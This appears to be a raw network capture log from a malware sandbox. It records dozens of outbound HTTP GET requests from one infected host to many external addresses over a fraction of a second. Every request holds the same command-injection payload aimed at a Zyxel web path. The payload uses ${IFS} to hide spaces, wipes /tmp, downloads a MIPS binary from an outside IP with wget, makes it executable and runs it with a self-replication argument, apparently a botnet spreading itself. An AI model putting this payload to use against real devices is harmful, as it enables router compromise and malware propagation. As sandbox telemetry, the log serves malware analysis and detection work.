                                                Jan 28, 2024 10:16:30.893461943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5800192.168.2.2347334118.182.194.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893481016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5801192.168.2.2352700221.153.104.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893502951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5802192.168.2.2334034208.125.92.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893536091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5803192.168.2.2334288155.94.163.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893553972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5804192.168.2.2354126120.203.169.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893604040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5805192.168.2.234840299.152.132.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893620968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5806192.168.2.2340840207.41.9.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893657923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5807192.168.2.234870884.43.231.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893709898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5808192.168.2.2337662123.188.15.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893723965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5809192.168.2.2352924173.104.251.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893743038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5810192.168.2.2356612181.140.194.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893760920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5811192.168.2.2349402216.246.234.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893786907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5812192.168.2.2344344210.207.178.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893795013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5813192.168.2.233708432.187.227.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893821001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5814192.168.2.2339850110.140.58.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893851042 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5815192.168.2.2346594199.222.175.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893877029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5816192.168.2.2335340128.141.236.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893918991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5817192.168.2.2353328138.9.179.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893932104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5818192.168.2.235619084.48.233.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893951893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5819192.168.2.235707693.231.222.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.893970966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5820192.168.2.234306494.149.174.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894022942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5821192.168.2.2346662161.10.32.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894032001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5822192.168.2.234840252.174.157.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894041061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5823192.168.2.2336324108.244.177.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894084930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5824192.168.2.233911054.248.10.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894119978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5825192.168.2.2358300212.202.49.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894146919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5826192.168.2.2338352148.115.165.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894190073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5827192.168.2.2342596136.13.202.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894218922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5828192.168.2.2347016192.133.191.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894253969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5829192.168.2.2355974189.8.63.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894300938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5830192.168.2.2346334149.208.5.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894330025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5831192.168.2.2347062168.94.171.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894351006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5832192.168.2.235736483.2.11.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894365072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5833192.168.2.2348402217.33.50.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894388914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5834192.168.2.235362435.141.2.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894404888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5835192.168.2.2353318176.107.189.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894439936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5836192.168.2.235776636.46.233.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894483089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5837192.168.2.23557741.121.98.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894509077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5838192.168.2.23424821.58.219.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894542933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5839192.168.2.234676672.75.247.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894555092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5840192.168.2.2354368137.217.142.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894586086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5841192.168.2.235422034.206.250.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894598961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5842192.168.2.2351334165.137.104.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894629955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5843192.168.2.235936294.117.156.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894670010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5844192.168.2.2352398108.179.149.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894682884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5845192.168.2.235066662.78.53.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894691944 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5846192.168.2.2354336100.240.227.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894722939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5847192.168.2.233920027.171.141.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894763947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5848192.168.2.2352524131.223.126.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894788980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5849192.168.2.2344206159.241.198.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894819021 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5850192.168.2.234878097.238.37.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894857883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5851192.168.2.233772281.213.190.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894866943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5852192.168.2.2342690140.228.153.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894901991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5853192.168.2.2359686207.192.98.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894933939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5854192.168.2.235415281.138.130.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894942045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5855192.168.2.235958268.66.225.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894980907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5856192.168.2.2350816188.104.158.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.894990921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5857192.168.2.234460825.24.6.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895003080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5858192.168.2.235462035.215.59.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895049095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5859192.168.2.2352068180.39.22.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895059109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5860192.168.2.233734054.157.101.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:30.895088911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5861192.168.2.233993041.65.134.176443
                                                TimestampBytes transferredDirectionData
